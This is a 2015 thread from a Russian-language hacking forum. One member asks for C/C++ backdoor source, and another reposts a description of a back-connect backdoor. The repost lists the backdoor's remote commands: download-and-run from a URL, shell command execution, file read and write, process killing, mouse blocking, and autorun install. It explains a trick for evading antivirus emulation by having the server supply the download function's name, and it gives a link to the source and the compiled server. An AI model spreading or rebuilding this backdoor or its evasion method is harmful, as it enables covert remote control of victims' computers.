1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Backdoor на (С/С++)

Тема в разделе "C/C++", создана пользователем Black-Wolf, 14 мар 2015.

  1. Black-Wolf
    Black-Wolf Новичок
    Симпатии:
    0
    Здравствуйте , кто может поделиться исходником простого Backdoor'а на (С/С++)

    По большей части интересует клиент Backdoor'а ,так что консольный вариант не особо подойдет ,но я все равно буду благодарен :)
     
    14 мар 2015
  2. Nemo
    Nemo Новичок
    Симпатии:
    7
    Собственно копипаст

    BackConnect Backdoor by Nu11ers3t
    Всем привет, написал на досуге бэкдор с бэкконнектом. В серверную часть ( т.е управляющую ) особо не вникал, поэтому ограничение только на одно соединение, можете допилить.
    [​IMG]
    Функционал, и пример работы с ним видно на скрине.

    Теперь обо всем по порядку:


    help - выводит хэлп по командам


    URLDownloadToFileA:yoursite.com/file.exe:expl.exe - скачать и запустить файл по ссылке http://yoursite.com/file.exe и сохранить с именем expl.exe в папке Temp, после чего запустить.



    Вот, команда которая заслуживает особенного внимания. Качает, как я думаю вы поняли, через URLDownloadToFileA, но самой строки, содержащей URLDownloadToFileA в бэкдоре нету, даже адреса, который ссылается на эту функцию нет.

    Обратите внимание на команду: во время получения команды, бэкдор сначала проверяет весь остальной функционал, и, если нету совпадения в командах, то проверяет 4 байта из URLDownloadToFileA, если они совпадают - то получает адрес функции из имени команды, т.е имя функции, ответственную за скачивание, бэкдор получает от сервера, таким образом, эмулятор антивируса не может знать, что делает этот код.

    ссылка без http:// должна быть!!

    install - установка в системе, по команде! Изначально бэкдор никуда не копируется и не пишется.
    uninstall - Удаление из системы
    cmd:command - выполнить команду command в командной строке
    close - закрывает текущее соединение и завершается


    BlockMouse - заблокирует мышку, тупо получая текущие координаты и в бесконечном цикле устанавливая их для мышки в отдельном потоке
    UnblockMouse - разблокирует мышку, завершив поток блокировки, если он есть


    ls - аналог команды dir в Windows, и ls в Unix - выводит файлы в текущей директории
    cd:dir - меняет текущую директорию на dir, пример:

    cd:C:
    cd:..Backdoor
    cd:Backdoor

    pwd - выводит текущую директорию
    ModuleFileName - Путь до исполняемого файла бэкдора
    Environment:Name - Выводит содержимое переменной окружения, пример:

    Environment:AppData
    Environment:TEMP
    Environment:WinDir

    Drives - Выводит все доступные диски в системе и их тип


    Read:file - Выводит содержимое file, размером менее 1 КБ.
    Write:file:data - Пишет data с новой строки в file, если файла нету - создает

    ps - Выводит список запущенных процессов
    Kill:name - Убивает процесс по имени.


    Весь функционал.


    В качестве сервера можно юзать хоть ncat, я юзаю свой. Его сорцы тоже в проекте, и скомпилированный файл в BackdoorReleaseServer.exe

    Скачать:

    https://mega.co.nz/#!YU0RjZIT!l2hOSHeoNFb4hd8eR54rFhDj6c46pVflojIMPm_i4O8


    P.S. Настройка через директиву #define
    P.P.S. Не забудьте, что на авторан прыгает только если получает команду install
     
    19 мар 2015
    1 человеку нравится это.
  3. Black-Wolf
    Black-Wolf Новичок
    Симпатии:
    0
    Спасибо , но это я уже видел !
     
    19 мар 2015

Поделиться этой страницей

Загрузка...